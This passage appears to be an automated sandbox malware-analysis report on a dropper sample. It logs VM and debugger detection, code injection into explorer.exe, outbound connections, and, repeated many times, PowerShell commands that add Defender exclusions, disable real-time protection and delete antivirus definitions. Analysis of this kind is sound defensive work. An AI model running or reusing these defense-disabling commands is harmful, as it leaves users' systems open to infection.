                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99C8D00 FindFirstFileExW,FindClose,21_2_00007FF6C99C8D00
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,21_2_00007FF6C99D8670
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99E26C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00007FF6C99E26C4
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,21_2_00007FF6C99D8670
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00995FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00995FC8
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                        Source: explorer.exe, 00000012.00000000.2007455568.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: /f8vmusrvc
                        Source: DE5A.exe, 0000002E.00000002.2588239210.000001E8E7E4C000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: dqemu-ga
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxservice
                        Source: explorer.exe, 00000012.00000000.2002954132.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: ComputerDefaults.exe, 00000026.00000002.2458413797.000002489A648000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareuser
                        Source: End.pif, 0000000A.00000002.1945641936.0000000001D78000.00000004.00000020.00020000.00000000.sdmp, End.pif, 0000000A.00000002.1945641936.0000000001D43000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2006529919.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2006529919.000000000982D000.00000004.00000001.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466223429.000001F0122D0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: q=fvmtoolsd
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmsrvc
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: fecodevmware
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: VNfvmwareuser
                        Source: explorer.exe, 00000012.00000000.2007455568.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: d2qemu-ga
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwaretray
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: fecodevmsrvc
                        Source: explorer.exe, 00000012.00000000.2006529919.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00\w
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000078A0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxtray
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
                        Source: explorer.exe, 00000012.00000000.2007455568.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2588239210.000001E8E7E4C000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: qemu-ga
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: S5%fvmwareservice
                        Source: explorer.exe, 00000012.00000000.2007455568.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareservicer`
                        Source: cmd.exe, 00000020.00000002.2459266793.0000028829C88000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _VMware_SATA_CD00#4&224f42ef&0&000000#{53f56N#sEd
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTTAVMWare
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2588239210.000001E8E7E4C000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmusrvc
                        Source: explorer.exe, 00000012.00000000.2006529919.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: fvmwaretray8!
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmtoolsd
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007A34000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBnx
                        Source: explorer.exe, 00000012.00000000.2002954132.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                        Source: explorer.exe, 00000012.00000000.2006529919.0000000009660000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                        Source: DE5A.exe, 0000002E.00000002.2588239210.000001E8E7E4C000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: dvmusrvc
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareservice
                        Source: wsruwii, 00000014.00000003.2594405805.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | API call chain: ExitProcess graph end node | graph_0-3791
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | System information queried: ModuleInformation
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Process information queried: ProcessInformation

                        Anti Debugging

                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | System information queried: CodeIntegrityInformation
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep | graph_10-105391
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Process queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A0F4FF BlockInput,10_2_00A0F4FF
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_0099338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_0099338B
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00995FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00995FC8
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009B5058 mov eax, dword ptr fs:[00000030h] 10_2_009B5058
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009B5058 mov eax, dword ptr fs:[00000030h] 13_2_009B5058
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00165058 mov eax, dword ptr fs:[00000030h] 20_2_00165058
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009F20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,10_2_009F20AA
                        Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
                        Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009C2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_009C2992
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009B0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_009B0BAF
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009B0D45 SetUnhandledExceptionFilter,10_2_009B0D45
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009B0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_009B0F91
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009C2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_009C2992
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009B0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_009B0BAF
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009B0D45 SetUnhandledExceptionFilter,13_2_009B0D45
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009B0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_009B0F91
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00172992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00172992
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00160BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00160BAF
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00160D45 SetUnhandledExceptionFilter,20_2_00160D45
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00160F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00160F91
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99CCA9C SetUnhandledExceptionFilter,21_2_00007FF6C99CCA9C
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99DB3CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF6C99DB3CC
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99CC8BC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF6C99CC8BC
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99CC030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00007FF6C99CC030
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF2BCE3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FFDFF2BCE3C
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF241CB7 SetUnhandledExceptionFilter,22_2_00007FFDFF241CB7
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF242126 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00007FFDFF242126

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Windows\explorer.exeFile created: wsruwii.18.drJump to dropped file
                        Source: C:\Windows\explorer.exeNetwork Connect: 65.108.69.93 443Jump to behavior
                        Source: C:\Windows\explorer.exeNetwork Connect: 179.159.229.64 80Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifThread created: C:\Windows\explorer.exe EIP: 31619F8Jump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifMemory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and write
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
